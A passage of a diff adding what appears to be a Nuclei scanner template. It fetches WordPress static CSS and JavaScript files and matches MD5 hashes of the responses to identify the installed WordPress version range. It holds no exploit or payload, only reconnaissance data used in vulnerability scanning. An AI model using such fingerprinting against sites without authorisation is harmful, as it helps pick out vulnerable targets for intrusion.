+ - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e44f9547d3fbe824463c374e751384ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64bf404fed71473984d2cd0eddef93e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2311887a1e17b942de617ba70baeda36\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c9797b3d827e091fda53c01f7131870b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"336f89e33e253fec3b2e53b2af555c87\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"d266c3e67470bf8f70d91d920b1b50f1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2cd66b3e286187e9d7e00d6436b6d36\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1d0285dfab8cb53ddc0d294668edc8d1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df6537dea2d237c35f611cf2de200b6a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"e785a905651a0ec0cdb0b5843991eaae\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b196971abc1abc7ea2cb4bc0a3ab7535\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d91c84783ccf8c7f179258952826f033\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e4c46395d986df5b5751711c6055f828\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"41615f8d0cbede34b5ced529fe9e5e7f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"944cd36ea235bb5195107a4df2ef8334\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b0dee38c8e76f4bee6878104104f63c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"7834f756df7bcd9b6158cabefe10feb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"96086cb89251901ecd80597778deb208\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e6cda1ba46e89d008f798c05a4e9570e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"befeb689473b0bf189ec4a39ee920bcd\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b483b39360a65b857ce7a566fb7825ae\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"abab055d551cb9c52c9d8d0b2a588451\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cff3ee84962d5176ae88a2a3d64392ac\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"5ea1958d0718eca4ff1a039e3390764e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cf0c3b2d9d0d890d9babc90f363f85e9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"750a05ebf45d615b94c0942523b579d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/server-side-render.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"655821377848fd385c27c38c37d61a07\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bcdd60e8b18b524afcd85e5880b84c33\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5044b9325a347214c9f52754edffa4a0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fdce9089e12dd585e67f28317028a534\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/media-utils.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1b84cc0c2ee1b6b872e501d0dc0c7107\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8730cf437a1617a3d774bcc9686746e3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"25bfaeb77aca280dafcb30ef8fab62f5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5261f82d95f8dd51c4c82631d0661c2a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/media-utils.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9766915643d7c7bf614e35b4121eefbd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f91031ce517bb7e6bb0cdd139429a894\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8356d9d46e55173927fb24ff5ec33d6e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e6c9ad652659f0fa8cd0893063da59d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/server-side-render.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8001395726ac015e4c7e04846fbdaf67\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7e256da1ed2ab582e23deb3d609a99c5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9bb79c23d92ccb79a9ee2117e746e1dc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1caaf0eecf4a874d07e07469f4dbfb56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/privacy-tools.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c9bd456399000e52825a2a70165b9163\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8467330290c25418a66f498d1eb2dbff\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d05fddf80bf5b83b0d2405ae30d64a5b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"068afb4a47bd50a2f7714c6c70735fd6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/privacy-tools.js" + matchers: + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"44714ea47fba8f5071cdecc00f7953f3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"67be42a8a198bae68f48d93072c98256\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"317d353064286735507b5e9345707249\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4e3acdfd3c994f71bbd24352da00eeb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"99166cce46b47d0181263f9a8b630b33\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"4a86ff8375f6af6a1793f20fcdfbbffc\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"b920b259910fda3187d7669d3344bbe5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e3751de1470210ce39ef99ef70f598e5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"72ed9f7c8543c820a198b27905f6b23d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"d959c635484426ce7f5044a74dc04224\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"8c56d38ee4c4c97d875fdbc20ac029dd\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ed03381714c58f75507c8ce11afd8c50\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"a58d848de37a14f15cd749e3b1f7baec\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"7b3e501ec7c14ac0847c594e02ff3cfa\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"ce5cd22ac555cbc5480519b1973fea37\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"aaab3e624de6193b961731c6be3c8c4b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d5cc5dfcade1038403083c43c0e0edb5\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4653d09cb28e97a8d8f44400af863fae\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"df9a9fa1f5ae362e5566eb609203316e\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"772a837e054ef6820107fbc8f622ef94\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e2b0b1b02f508015c9495d62d63e9111\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"50faf7bda2c48f21c2c541429518a371\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"830550348b2fcab412282a6f0415d67a\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e5f05c023be52b6170f029a2c47ea0fb\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9d57cc3de14e3597d49407ba21650a17\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"581ce00c1f81d6144ca03c4c913f106c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"53ce6b4e6ae287a145d4c6919a1337ab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"40a44a54bbdf9b7e30bbf82278ec1142\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"310f82bdb9de9fce084a50495d3b9ba6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ef1095216e72a031f4697230a289698f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-suggest.min.js" + matchers: + - type: dsl + name: 4.7.4 - 5.1.8 + dsl: + - "(\"b0e2e58bbcb8654f8f6c09726c8df7e8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"5023f66fa980414e5177e9a6b29aff26\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d305434988f3f831e6f1883d4a750948\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d9b22becd5790ce6250cf1388f73ce69\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"181ee51385ab5b269fc5058358ed3648\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9b583c7e26f46e775ba680e47bcb5594\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"96ede3a05eadc3faf83991ef0af63bff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/api-fetch.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f09de7c7aeb73fa3f8a1e53e6ff4b305\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"50516221babd83d0bf95ea4ecd5d58a0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c5d94ec07709fba77643a6774d477a7b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"36a5d2e1b03d0efed47043e216c3d2f9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c43ea46c5886fd155f2fd7994ce6310d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5e072b558117cc528e20274eda36d809\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/api-fetch.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"da6b492eec5e352193be733652fb3209\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"67515582038f82ad0b094aa5e0bc1dcd\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e52101f853577a9ec8e7cb8137e33640\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"19ce453efbd74d06a81ec228ce1d5247\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0edb88ae670f70a377b6ef4eef223c60\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"32f22e45308fe3062b9f86b0fc710934\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"1d585ce73cc724afa36727542a43ac97\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"acde1b98f59602f08ceb5fd36bd116de\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8aec553ccda8f9b035a814de6f28e029\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"18c4e388773b6895f69f94afba477dad\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3cf7496ac98d8d4a80dbd992c88a2213\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"df9f83c7ab58ba1c731325ce127bf00f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"7d8ad191246e8e6dea0203f73f8cc061\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"70b8c60b095f1d4eddeb602e80d7cb85\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"af4267c09a196d31e97cdd99c7eeebe9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a9a86cca30847bf34025e2a4342b6af8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"68a1d3d8f24e182f39bbe411c9ce2fdf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ca2bf1e3d15250cb35bab844663c6e38\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blob.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"e6c27ec1d6668699f712c56b4a819f4d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cdd5db3c87800508f5e73210f76c4c88\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"58bfb37a8081b4eda6e024b135919aa3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b76f444fce3aa2ba000a9b2c1a50b381\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f12d56e6713d792b1245c9699d14f7a9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"35ce2c589e64f4e72999b2d6f8a9c39f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/blob.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f8b9570fbad012216e0ad8a1ea84187e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4272a74803c18ece3799c135f196ab0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"7034bef89a578a00a44d10809d7394a0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2984c649c84fffa8beb5ab6fe6c70ece\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fafa70f30162fb34955b073cbb99f885\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b5a777b54fbdb90ff36aea7830fed7fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/autop.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"a207f32426009dc93b26585ed42aee17\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6284d2de63c7aee03f2278c7dc98356c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b7cd543a0b0cd07e45cd1bc25a638726\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2e7ffbb6b277d278b6effac42f48f3c1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"573ab119d54915cd9f53682769c50cf1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"317b59ed97f57a1f932895e1906e6f32\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/autop.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"7ee01d53b8d7ab46463b64f64d504520\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"14123b164f7ad2487fa8e143d22ac143\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"31e1f40e1156574c98fc4b0cf735857a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ff51ce763fa631677610fab1cb95aab1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"676d8f976d7f2d5a14dd15bff63b288a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"450bf21d976c0b84b175f3578b865f4b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"d3835cf3e87d8764e8c9ba8e470af641\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2cb783b7dd13ccb77d1eb4ac11141591\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8fc455cde485dbee10fb0d2d21a6e240\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e777f5e1e54a62909a9c667a857c8a06\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"761147c3559453c26dbbac541a1db6c0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8828bb7def5a91617f8dc92ff1d54cb6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"690c76f64d35502bc7e4c367bb4efea4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"02df3e2c9415c49b296e4a9142e3f385\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"51e05fb6e2cd8020f046629e1d214bdd\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"40b486615e5c5a7435a067a51b8e6c5c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"502c81a537b4ba42a46393bc5ff5115a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8a424a086235b9d27ce3aeb9a7d895ae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"9a5451d5e895048dffe2507330037cca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1fd071e6f21a55c48664fa01f510d3ff\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"067f1fa67dc68c39b293875357a49b0f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"39d93ff8fb552ad4b4f4a53c21b64aa4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"548185fa04074d4d27d1df6afe60e4ef\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"01a78df6a74a122f060f9d09cce385f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"51e91a4aa751cd486eb1c5f4a90186f6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4cf6bdba8a45c4c95790ffba417b4095\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"acaea46a81c4c475aff738dbab35dea9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3f96e5de3731e81e254ad0804005dbf3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"00b6d9456f13d06dc8d7ea4455e37069\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"65c0141abc2fe9d9bba8b5331c3274ec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keycodes.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"4922391431de20246f0ce7a2d74043ec\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"d398b8fab3582fd237c150f65310747e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"64ab87f3071718276127e84f59778fad\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"094e9a4938e3845babaf160eacb7d657\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"48fd05b4c2627f3d3a48cfb98ed91356\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"099b33475e54c64309e7b9a5ebb5d092\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"eb49fabbe0dc208ace2eca6d108a5a63\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cedaabb320bb1e0328e3f6cd45b60574\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/annotations.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"869b6589b93642d645a7ff94d34c9bcd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"07e8500c949b1e53ed07759160193182\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1c8d75758692f38df662408bb0c46d13\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"54ba0b53e14340443743833e8b02af6f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e1bc9760ad82c3b9169ecabe8b535bba\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"22df64d39c77eb46745305cc79a1f8d9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9e8dafcf437caed1c7d4145d23d3027b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"44dafed8854af59b0c02f93f172c4760\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/nux.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"58ca84c8a9864a3dc873fdc4c453f48b\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"80332405c607e928fa6a16de140aa4c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9916d74df1d25dc1cf23ee6645a1bb1f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b5b93be950c5d3a6e194e94cfdfbdcb5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4e0704461feab9e3bea09c010240945d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"39e8386e44bce82d81d29c8782a86994\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6caa763feddc6018d9f1ec6dfabe82d8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b69996f7b611c2961e41f80bf5c0220\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/date.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"09bd7ec81cc275569f740ca0947d7090\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"5d459e25af93fd190cbe45fe0393622a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fe68c7cfe0cd91ae976ee9f1c593b538\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b43650e9707f46259c1588940adb3e0d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3e8aefa8bd479feb0b73915bb0efa21b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5456867a601e6e6d63593fa18e24c3ee\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c21f513f4347eddbecbd26ee92176d7f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e15b9968669f4f270a564b7884e8193\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/date.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"d2afab5af40ed42065d752c7be23a055\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"95a892f98c25fe1f4b577bd187db7dbf\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d6ffddf9882e571a9552423efefb67e9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e72b12ad40beea703e88b1f147df141e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c3c7d67bf8ad5e0c9ea514bb97cd5e1a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ef68dcd75662d8a6186bb74a73a2dce1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5ccc243c7115d389be5056139dcd625a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8b69d11c1ddd6302e78055ec64161814\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/annotations.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"157003fc3dac9012c20621ee1b7a0c12\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"16dd6bf7592ecc3334fcda83d2b9a7a5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"dc558bf92a947005943cc5a6d86f65c9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b2761292ae7b37b2535c41d776576e6f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fc378b756c507156d3bb57647a2fa305\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7ffb528925a345287bf91fc1bfdc48c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"db814e86353b29081bab44e9ce633780\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"72e43256343bd24f7f7b1c84d911f752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/nux.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ea02e17cc487eecd2c884730ca83d19f\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"4da60c791df64a2f136d684b8c6a094c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"92e4b04f1c3861f31bd7f3dd7a3b7afe\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79fb8c5a535be1a6085cef841c12a1bc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5e3a8dd193aba379149ae58ff4fcb7ad\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d01744b1e9eeb486e13f6e967d8e9adb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"11453aa4f082dfb12090aa6a8134f083\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2306679567a599c1866e706a06a76670\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keycodes.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ca4ed904bbcce34e6346622f492a09b3\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"8984f96477ccd220c22d2798088414d1\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a4e82399a30c4e01d4ce7f1df5f8e6be\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b29b25b69e966f8e7d01ff3b0c33e487\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"17a7829459e9f1c0f0e9b623540b7e45\" == md5(body))" + - type: dsl + name: 